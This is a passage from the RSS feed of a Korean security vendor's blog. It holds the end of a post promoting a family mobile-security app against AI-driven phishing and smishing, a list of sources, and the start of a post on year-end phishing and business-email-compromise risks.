-apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;알림&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;제공&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p id=&quot;SE-aacfb67b-7070-4c49-97a5-f4bdc67efed8&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-3c825b66-4524-4df4-a5f3-d341b3720446&quot; data-a11y-title=&quot;사진&quot; data-compid=&quot;SE-3c825b66-4524-4df4-a5f3-d341b3720446&quot;&gt;
&lt;div&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-3c825b66-4524-4df4-a5f3-d341b3720446&quot; data-unitid=&quot;&quot;&gt;
&lt;div&gt;
&lt;div id=&quot;SE-3c825b66-4524-4df4-a5f3-d341b3720446&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;&quot; data-unitid=&quot;SE-3c825b66-4524-4df4-a5f3-d341b3720446&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;936&quot; data-origin-height=&quot;923&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bv1DUe/dJMcaiopYnr/2ukIyVdllDrkGPl5qBYm9K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bv1DUe/dJMcaiopYnr/2ukIyVdllDrkGPl5qBYm9K/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bv1DUe/dJMcaiopYnr/2ukIyVdllDrkGPl5qBYm9K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbv1DUe%2FdJMcaiopYnr%2F2ukIyVdllDrkGPl5qBYm9K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;693&quot; height=&quot;923&quot; data-origin-width=&quot;936&quot; data-origin-height=&quot;923&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/div&gt;
&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-6be25462-2838-4e5d-bf85-10b53f30887e&quot; data-a11y-title=&quot;본문&quot; data-compid=&quot;SE-6be25462-2838-4e5d-bf85-10b53f30887e&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-6be25462-2838-4e5d-bf85-10b53f30887e&quot; data-unitid=&quot;&quot;&gt;
&lt;div id=&quot;SE-ae47c3c1-0046-490d-97ce-c69bb83ed9a7&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p id=&quot;SE-24412783-89e2-43e2-8b86-1e208e7524fe&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;가족 모두가 꼭 기억해야 할 보안 수칙 7가지&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;자동으로 위협을 차단하는 보안 기능과 함께, 일상 속 기본 보안 습관을 병행하는 것도 중요합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-da2966a5-6eb3-4380-ae94-a48c612b1f8b&quot; data-a11y-title=&quot;사진&quot; data-compid=&quot;SE-da2966a5-6eb3-4380-ae94-a48c612b1f8b&quot;&gt;
&lt;div&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-da2966a5-6eb3-4380-ae94-a48c612b1f8b&quot; data-unitid=&quot;&quot;&gt;
&lt;div&gt;
&lt;div id=&quot;SE-da2966a5-6eb3-4380-ae94-a48c612b1f8b&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;&quot; data-unitid=&quot;SE-da2966a5-6eb3-4380-ae94-a48c612b1f8b&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;936&quot; data-origin-height=&quot;1127&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bArnBM/dJMcaf6i769/DfGRsy5tHKJa2q12Q9BuHK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bArnBM/dJMcaf6i769/DfGRsy5tHKJa2q12Q9BuHK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bArnBM/dJMcaf6i769/DfGRsy5tHKJa2q12Q9BuHK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbArnBM%2FdJMcaf6i769%2FDfGRsy5tHKJa2q12Q9BuHK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;519&quot; height=&quot;1127&quot; data-origin-width=&quot;936&quot; data-origin-height=&quot;1127&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-8074aee4-9f55-4960-9e7f-f89320a4101a&quot; data-a11y-title=&quot;본문&quot; data-compid=&quot;SE-8074aee4-9f55-4960-9e7f-f89320a4101a&quot;&gt;
&lt;div&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-8074aee4-9f55-4960-9e7f-f89320a4101a&quot; data-unitid=&quot;&quot;&gt;
&lt;div&gt;
&lt;div id=&quot;SE-bf2d0ef9-8cef-4c35-918d-4e8f9d2cea65&quot;&gt;
&lt;p id=&quot;SE-00a63c40-ed1c-4b66-93c8-b5db57949fb5&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;작은 보안 습관 하나가 큰 피해를 막을 수 있습니다. AI 기반 위협이 빠르게 확산되는 지금, 우리 가족의 스마트폰이 노출된다면 그 피해를 누구도 장담할 수 없습니다. 스미싱 문자 한 통, 가짜 앱 하나만으로도 사진과 메시지, 계정 정보까지 악용될 수 있는 시대입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&lt;b&gt;모바일 보안은 이제 선택이 아니라 필수입니다.&lt;/b&gt; &lt;/span&gt;&lt;b&gt;지금 바로 알약을 무료로 다운로드하고, 패밀리케어로 AI 기반 실시간 보호를 직접 경험해 보세요. 우리 가족의 스마트폰을 지키는 첫걸음은, 바로 이 버튼 클릭에서 시작됩니다.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-fd9c254b-ebc7-4276-93e5-211cfb8c970b&quot; data-a11y-title=&quot;사진&quot; data-compid=&quot;SE-fd9c254b-ebc7-4276-93e5-211cfb8c970b&quot;&gt;
&lt;div&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-fd9c254b-ebc7-4276-93e5-211cfb8c970b&quot; data-unitid=&quot;&quot;&gt;
&lt;div&gt;
&lt;div id=&quot;SE-fd9c254b-ebc7-4276-93e5-211cfb8c970b&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;&quot; data-unitid=&quot;SE-fd9c254b-ebc7-4276-93e5-211cfb8c970b&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384072 (3).png&quot; data-origin-width=&quot;651&quot; data-origin-height=&quot;122&quot;&gt;&lt;a href=&quot;https://bit.ly/4jgR6eF&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c3T06Q/dJMcaiopZmm/yvfhC97r46qgVG3RtWGAk0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc3T06Q%2FdJMcaiopZmm%2FyvfhC97r46qgVG3RtWGAk0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;330&quot; height=&quot;62&quot; data-filename=&quot;Group 2034384072 (3).png&quot; data-origin-width=&quot;651&quot; data-origin-height=&quot;122&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/div&gt;
&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-40a7d29e-df12-4807-ba20-6eae02a6dee5&quot; data-a11y-title=&quot;본문&quot; data-compid=&quot;SE-40a7d29e-df12-4807-ba20-6eae02a6dee5&quot;&gt;
&lt;div&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-40a7d29e-df12-4807-ba20-6eae02a6dee5&quot; data-unitid=&quot;&quot;&gt;
&lt;div&gt;
&lt;div id=&quot;SE-95c89a89-8ddd-46e9-ba3f-42b472f02326&quot;&gt;
&lt;p id=&quot;SE-b9f6248d-16fa-4f43-8043-bf002d1594f3&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[참고출처]&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;DeepStrike &amp;ndash; &lt;a href=&quot;https://deepstrike.io/blog/ai-cybersecurity-threats-2025&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;Phishing Statistics 2025, AI Cyber Attack Statistics 2025, AI Cybersecurity Threats 2025.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Deloitte / AT&amp;amp;T 사례 &amp;ndash; &lt;a href=&quot;https://www.deloitte.com/us/en/insights/topics/technology-management/tech-trends/2025/att-ai-cybersecurity-practices.html&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;A no-nonsense approach to secure AI enablement at AT&amp;amp;T.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;학술&amp;middot;기술 자료 &amp;ndash; &lt;a href=&quot;https://dl.acm.org/doi/pdf/10.1145/3716628&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;AI agents 및 NHI 보안 위협 관련 설문&amp;middot;연구&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;ZeroThreat &amp;ndash; &lt;a href=&quot;https://zerothreat.ai/blog/deepfake-and-ai-phishing-statistics&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;Deepfake Attacks &amp;amp; AI-Generated Phishing: 2025 Statistics&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;StrongestLayer 및 기타 &amp;ndash; &lt;a href=&quot;https://www.strongestlayer.com/blog/ai-generated-phishing-enterprise-threat-2025&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;AI-Generated Phishing 위협 및 필터 우회 관련 분석.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Pindrop &amp;ndash; &lt;a href=&quot;https://menafn.com/1109665897/Pindrops-2025-Voice-Intelligence-Security-Report-Reveals-1300-Surge-In-Deepfake-Fraud&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;2025 Voice Intelligence &amp;amp; Security Report 및 Deepfake fraud 관련 기사&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Signicat, Keepnet Labs &amp;ndash; &lt;a href=&quot;https://www.signicat.com/press-releases/fraud-attempts-with-deepfakes-have-increased-by-2137-over-the-last-three-year&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;딥페이크 사기 비중(약 6.5%) 및 증가율 관련 통계&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Deepfake 통계&amp;middot;사례 &amp;ndash; &lt;a href=&quot;https://www.pindrop.com/article/why-deepfakes-enterprise-communications-urgent-threat/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;다양한 딥페이크 사기 동향 및 사례 정리 자료&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;일반 피싱&amp;middot;스미싱 및 가족 보안 수칙 &amp;ndash; &lt;a href=&quot;https://www.forbes.com/councils/forbestechcouncil/2025/05/02/ai-is-amping-up-phishing-smishing-and-vishing-attacks/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;글로벌 피싱 통계, 사용자 보호 가이드 자료&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>ai피싱</category>
      <category>AI피싱트렌드</category>
      <category>개인보안</category>
      <category>보안동향</category>
      <category>스미싱</category>
      <category>스미싱차단</category>
      <category>알약패밀리케어</category>
      <category>패밀리케어</category>
      <category>피싱</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5695</guid>
      <comments>https://alyacofficialblog.tistory.com/5695#entry5695comment</comments>
      <pubDate>Wed, 31 Dec 2025 09:30:12 +0900</pubDate>
    </item>
    <item>
      <title>연말 시즌, 기업과 개인을 동시에 노리는 사이버 공격 주의보</title>
      <link>https://alyacofficialblog.tistory.com/5694</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;연말은 한 해를 마무리하는 시기이자, 사이버 공격자들이 가장 활발하게 움직이는 시기이기도 합니다. 실제로 다수의 글로벌 보안 리포트와 침해 사고 통계를 살펴보면, 연말과 연초는 피싱&amp;middot;스미싱&amp;middot;랜섬웨어&amp;middot;계정 탈취 공격이 집중적으로 증가하는 대표적인 고위험 구간으로 분류됩니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;업무 마감과 결산이 몰리고, 개인 역시 소비와 이동이 늘어나며 판단력이 느슨해지기 쉬운 시기. 바로 이 &amp;lsquo;틈&amp;rsquo;을 공격자들은 놓치지 않습니다. 연말은 단순히 바쁜 시기가 아니라, 구조적으로 보안 사고가 발생하기 쉬운 환경이 만들어지는 시점입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384079 (1).png&quot; data-origin-width=&quot;1030&quot; data-origin-height=&quot;578&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/buAucO/dJMcafrHWIG/LYQGEAMkMK8qeTrJqUBav1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/buAucO/dJMcafrHWIG/LYQGEAMkMK8qeTrJqUBav1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/buAucO/dJMcafrHWIG/LYQGEAMkMK8qeTrJqUBav1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbuAucO%2FdJMcafrHWIG%2FLYQGEAMkMK8qeTrJqUBav1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1030&quot; height=&quot;578&quot; data-filename=&quot;Group 2034384079 (1).png&quot; data-origin-width=&quot;1030&quot; data-origin-height=&quot;578&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #006dd7;&quot;&gt;&lt;b&gt;왜 연말이 사이버 공격의 성수기일까?&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;연말은 기업과 개인 모두에게 보안 관점에서 구조적으로 취약해지는 시기입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;기업: 바쁜 업무 환경 + 느슨해진 보안 통제&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;기업의 경우 예산 집행, 정산, 연말 결재 등으로 이메일과 문서 교류가 급증하고, 임원이나 주요 의사결정자의 부재로 확인 절차가 느슨해지는 경우가 많습니다. 협력사&amp;middot;외주 인력과의 단기 업무가 늘어나면서 접근 권한 관리 역시 복잡해집니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;예산 집행&amp;middot;정산&amp;middot;결산 업무로 이메일&amp;middot;문서 교류 급증&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;임원&amp;middot;관리자 부재로 결재 프로세스 지연&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;협력사&amp;middot;외주 인력과의 단기 업무 증가&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;보안 담당자의 휴가&amp;middot;인력 공백&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이런 환경을 노려 공격자는 결재 요청을 사칭한 이메일(BEC), 송금 계좌 변경 요청, 악성 첨부파일이 포함된 업무 메일을 정교하게 유포합니다. '연말이라 바빠서 미처 확인하지 못했다'는 말이 사고의 출발점이 되는 이유입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;개인: 소비&amp;middot;이동 증가로 판단력 저하&lt;/b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;개인 사용자 역시 예외는 아닙니다. 연말에는 택배, 결제, 환불, 이벤트 안내 문자가 급증하고, 항공권&amp;middot;숙소&amp;middot;모임 예약 등 링크 클릭 빈도도 자연스럽게 높아집니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;택배&amp;middot;결제&amp;middot;환불 안내 문자 증가&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;연말 할인&amp;middot;이벤트&amp;middot;쿠폰 메시지 범람&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;항공권&amp;middot;숙소&amp;middot;모임 예약 관련 링크 클릭 증가&lt;/span&gt;&lt;/li&gt;
